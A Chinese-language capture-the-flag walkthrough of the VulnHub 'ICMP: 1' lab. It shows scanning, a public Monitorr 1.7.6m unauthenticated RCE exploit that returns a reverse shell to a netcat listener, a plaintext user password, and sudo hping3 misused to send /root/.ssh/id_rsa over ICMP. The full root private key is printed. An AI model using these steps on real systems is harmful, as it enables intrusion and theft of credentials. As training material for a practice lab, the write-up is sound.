Vulnhub之ICMP靶机详细解题过程

管理员

ICMP

作者:jason_huawen

靶机基本信息

名称:ICMP: 1

地址:

https://www.vulnhub.com/entry/icmp-1,633/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.79.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:9a:82:57      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.216  08:00:27:c7:4a:d1      1      60  PCS Systemtechnik GmbH                                                    

                                                                            

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.216

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 02:40 EST
Nmap scan report for localhost (192.168.56.216)
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:C7:4A:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

NMAP扫描结果表明目标主机有2个开放端口22(SSH)、80(HTTP)

Get Access

┌──(kali㉿kali)-[~/Vulnhub]
└─$ curl http://192.168.56.216     

用Curl命令访问目标主机的80端口,没有返回内容。但是用浏览器访问80端口,会被自动重定向到http://192.168.56.216/mon

┌──(kali㉿kali)-[~/Vulnhub]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.216
+ Target Hostname:    192.168.56.216
+ Target Port:        80
+ Start Time:         2022-11-24 02:47:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /mon
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2022-11-24 02:48:38 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.216
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/24 02:48:54 Starting gobuster in directory enumeration mode
===============================================================
/mon                  (Status: 301) [Size: 314] [--> http://192.168.56.216/mon/]
/server-status        (Status: 403) [Size: 279]
Progress: 220102 / 220561 (99.79%)===============================================================
2022/11/24 02:49:23 Finished
===============================================================

用nikto和gobuster工具没有扫描出新的目录。

不过从返回的页面内容可以知道CMS的类型和版本 Monitorr 1.7.6m,利用searchsploit查询,竟然有相应的远程执行漏洞:

┌──(kali㉿kali)-[~/Vulnhub]
└─$ searchsploit Monitorr                                      
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass                                                      | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)                                   | php/webapps/48980.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                             
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ searchsploit -m php/webapps/48980.py
  Exploit: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/48980
     Path: /usr/share/exploitdb/exploits/php/webapps/48980.py
File Type: Python script, ASCII text executable, with very long lines (434)

Copied to: /home/kali/Vulnhub/ICMP/48980.py


                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ ls
48980.py  nmap_full_scan
                           

将漏洞利用代码拷贝到工作目录,执行该代码,在Kali linux上成功得到目标主机反弹回来的shell:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ python 48980.py http://192.168.56.216/mon 192.168.56.206 5555
A shell script should be uploaded. Now we try to execute it
                                                                   
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.216] 37470
bash: cannot set terminal process group (536): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ 

www-data@icmp:/home/fox$ ls -alh
ls -alh
total 20K
drwxr-xr-x 3 root root 4.0K Dec  3  2020 .
drwxr-xr-x 3 root root 4.0K Dec  3  2020 ..
lrwxrwxrwx 1 root root    9 Dec  3  2020 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4.0K Dec  3  2020 devel
-rw-r--r-- 1 fox  fox    33 Dec  3  2020 local.txt
-rw-r--r-- 1 root root   78 Dec  3  2020 reminder
www-data@icmp:/home/fox$ cat local.txt
cat local.txt
c9db6c88939a2ae091c431a45fb1e59c
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
www-data@icmp:/home/fox$ cd devel
cd devel
www-data@icmp:/home/fox/devel$ ls -alh
ls -alh
ls: cannot open directory '.': Permission denied
www-data@icmp:/home/fox/devel$ cd ..
cd ..
www-data@icmp:/home/fox$ 

www-data@icmp:/home/fox$ sudo -l    
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
www-data@icmp:/home/fox$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@icmp:/home/fox$ 

提权

试了很久,找各种漏洞 或者配置都没成功,而且一直觉得作者给出reminder这个提示肯定是有用的,开始是认为crypt.php在某个目录,其实是在/devel目录下,虽然没有进入/devel目录的权限,但是基于作者的提示,可以查看crypt.php的内容:

www-data@icmp:/home/fox$ ls -alh devel/crypt.php
ls -alh devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec  3  2020 devel/crypt.php
www-data@icmp:/home/fox$ ls -alh devel
ls -alh devel
ls: cannot open directory 'devel': Permission denied
www-data@icmp:/home/fox$ ls -alhd devel
ls -alhd devel
drwx--x--x 2 fox fox 4.0K Dec  3  2020 devel
www-data@icmp:/home/fox$ 

这样就拿到了fox的密码!

www-data@icmp:/home/fox$ su - fox
su - fox
Password: BUHNIJMONIBUVCYTTYVGBUHJNI
id
uid=1000(fox) gid=1000(fox) groups=1000(fox)
which python
/usr/bin/python
python -c 'import -c pty;pty.spawn("/bin/bash")'
  File "<string>", line 1
    import -c pty;pty.spawn("/bin/bash")
           ^
SyntaxError: invalid syntax
python -c  'import pty;pty.spawn("/bin/bash")'
fox@icmp:~$ ls
ls
devel  local.txt  reminder
fox@icmp:~$ cd devel
cd devel
fox@icmp:~/devel$ ls -alh
ls -alh
total 12K
drwx--x--x 2 fox  fox  4.0K Dec  3  2020 .
drwxr-xr-x 3 root root 4.0K Dec  3  2020 ..
-rw-r--r-- 1 fox  fox    56 Dec  3  2020 crypt.php
fox@icmp:~/devel$ sudo -l
sudo -l
[sudo] password for fox: BUHNIJMONIBUVCYTTYVGBUHJNI

Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
fox@icmp:~/devel$ 

直接执行hping3命令无法成功,因为必须是icmp模式,但是可以通过这个命令读取文件,比如root用户的私钥

开启两个终端,一个启用listen模式,另一个启用发包模式,发包模式下读取/root/.ssh/id_rsa文件

fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=47727 icmp_seq=0 rtt=5.6 ms
len=128 ip=127.0.0.1 ttl=64 id=47896 icmp_seq=1 rtt=4.9 ms
len=128 ip=127.0.0.1 ttl=64 id=47903 icmp_seq=2 rtt=5.5 ms
len=128 ip=127.0.0.1 ttl=64 id=47938 icmp_seq=3 rtt=4.2 ms
len=128 ip=127.0.0.1 ttl=64 id=48082 icmp_seq=4 rtt=4.1 ms
len=128 ip=127.0.0.1 ttl=64 id=48244 icmp_seq=5 rtt=3.7 ms
len=128 ip=127.0.0.1 ttl=64 id=48407 icmp_seq=6 rtt=3.5 ms
len=128 ip=127.0.0.1 ttl=64 id=48646 icmp_seq=7 rtt=3.7 ms
len=128 ip=127.0.0.1 ttl=64 id=48792 icmp_seq=8 rtt=3.4 ms
len=128 ip=127.0.0.1 ttl=64 id=49003 icmp_seq=9 rtt=3.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49225 icmp_seq=10 rtt=2.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49238 icmp_seq=11 rtt=1.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49484 icmp_seq=12 rtt=1.4 ms
len=128 ip=127.0.0.1 ttl=64 id=49529 icmp_seq=13 rtt=7.9 ms
len=128 ip=127.0.0.1 ttl=64 id=49592 icmp_seq=14 rtt=7.3 ms



可能需要定义-d 即数据的大小,否则接收不到

这样我们就读取了root用户的私钥,在kali linux本地建立文件(以上面通过hping3输出的内容作为私钥)

┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ >....                                                                                                                     
LaXVQLTnGH4UerV7LqCnzwg/B9Df9FxClQB2kBlpC/xABkKj7qhjExi7+tspS/G6VXXgGq
JemiXcQE92oJcTnLoXYBxQD1R3qIxrSGjZqYj6tHyFmbVd4CYkkbpuxgRlEfmloTemRJ5+
1rjrjo4m7VCzWnZyBMjz+8aZRHKB1nng7zNOtDLS8daI7/HoNt2wL3f6abMlIjsNvwCRne
R50R/chWQl8yfm4GuqFdkh/eQf6XwXNLCg+SJ/6+AhVvjU1B+Wd4l9nUGXaEJyomYyiuGg
LC3Iy191cwDa+1jukS2p8QH3y9MRcQAAAAMBAAEAAAGAAiBk4NqLn0idBZCFwL1X8D2jHH
HoJqMVou7Qq4FS4HtA9En1WIq32s3NxrIFp8xQrw8yfVioiRb+EXYlZxxrMdEqTg2OqWDH
xmqTfazViIZWI4Wpe2yrGxX3WUEY098zP3LDIFzYZiPPX1HasqZmHwaVMal9HxAyUvmTCZ
oP1cnRMwhjsDbp0TttpXw5W4UB0icPWoCjG9f0onAyeFGwz9uH0gAyDFct08eeXHKByCoZ
XcEeewMC4G0Y5vrQwZFEJcEP7+FES0RHCT8itoeC51t4HOtHLX5BKcApf8cAp3LK8alEl3
lJfLklX2Rm8v9l4RjWxxAgFpmY5o4PeXLeKP6/35VewAmMwNiZ17J/MOUMsj/2SCNxYh7Z
LmIIL9B65ipd/L7RXSbFhpGbT6jyOYzDI8D6VGwCEhMiVITntyh5YvimgZTzlP3zmTsxX5
lmyAn/RIJ6tXnXIkmGw1QjHfS0eI5ny+vR8SlmDnTlF1LFk65+qY42sWWeVweP4tkxAAAA
wDvG1aNPq532hZw+P5NzrocyRSu4GfmygSpZY13OTtKGPDjQMPwABPYFOYS/cul0i9mpS1
SeBllnDJbEwM3/iH6k/YlEuT7tIKeRbx/8MTAjkCO0sBWyA4k3tFbupsZu2/jWOxrcUgeH
1833FdCX/EyAzBDirDopqYmR77SDERqOYLbwgv6r2J6rj4FboRemx2T1XRo+DJOczlU0yJ
vTKQRbCFe3+Z5ZYkMg3SCvMsbu1vj+f9pu0uG84s3R3FFGYAAAAMEA0aLIF8pXABXUD+60
bIXpizYMoodJHl02C17wBjMWVzEYah6Vq+ZvoOvqMISkeIIhDUf8jwgaFVYkv/Nr33qmSN
FsEms4d8vJ9c8MFWykmxvmSwVh26G0DQxlASZ3exgyqmnCl9LSGwY0W4brH6nOrKRBKDTH
xeMBxuxNdkfU6ABy5NbrSmMnQP/bLozC1GJlyB4TAvvK/PH29L8ncSzsx9KimV4eM3fv1j
5x+VwcOnMnbzg8F1RrA5O6xJfYMnQVAAAAwQDPS88AHHxqwqg2LocOLQ6AVyqDB6IRDiDV
mI4KG5dALS8EnHGmObVhx6qiwi09X666eDen2G/W1bVc8X9lyJVVtKEdOhLrizkPAqY3wW
9V/kC7S2DX0aDYpVyZTSpeV63SPHCrN1jryAQMMgz+CswS7/sIqEUAPNqMAxzoziR3WBIG
qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix
q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw==
-----END OPENSSH PRIVATE KEY-----" > isa_id
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ cat isa_id     
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ chmod 400 isa_id 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ ssh -i isa_id root@192.168.56.216
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@icmp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@icmp:~# cd /root
root@icmp:~# ls
proof.txt
root@icmp:~# cat proof.txt
9377e773846aeabb51b37155e15cf638
root@icmp:~# 

成功提权!